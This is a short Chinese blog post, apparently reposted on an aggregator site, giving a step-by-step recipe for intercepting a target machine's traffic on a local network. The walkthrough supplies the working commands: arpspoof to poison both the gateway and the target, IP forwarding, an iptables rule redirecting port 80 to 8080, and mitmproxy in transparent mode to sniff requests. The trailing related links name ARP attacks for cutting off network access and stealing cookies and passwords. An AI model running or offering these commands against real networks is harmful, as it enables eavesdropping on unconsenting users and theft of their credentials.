mimtproxy和arpspoof实现局域网MITM

Posted 方方和圆圆

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mimtproxy和arpspoof实现局域网MITM相关的知识,希望对你有一定的参考价值。

  本地环境

  环境:kali系统

  目标机器:192.168.0.101

  局域网网关:192.168.0.1

  当前网络网卡端口:wlan0

  arp欺骗流程

  命令行开启本地数据转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

  arpspoof局域网arp欺骗神器:

  欺骗网关,伪造我是目标机器:

arpspoof -i wlan0 -t 192.168.0.1 192.168.0.101

  欺骗目标机器:

arpspoof -i wlan0 -t 192.168.0.101 192.168.0.1

  然后目标机器的所有数据,都会走我们本地机器, 现在开始嗅探目标的数据请求信息,我们使用mitmproxy

  mitmproxy嗅探数据

  在本机kali机器执行iptables的数据转发,把所有经过80端口的数据,转发到8080:

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

  使用mitmproxy启动代理服务, mimtproxy的默认代理端口为8080

 mitmproxy -T

 

作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

以上是关于mimtproxy和arpspoof实现局域网MITM的主要内容,如果未能解决你的问题,请参考以下文章

kali---arpspoof局域网断网攻击arpspoof: couldn't arp for host

arpspoof中间人攻击,拦截内网图片

局域网arpspoof欺骗获取cookie/图片/密码

APR攻击(Arpspoof)

漏洞复现局域网 ARP 中间人攻击 获取他人账号密码

kali 局域网嗅探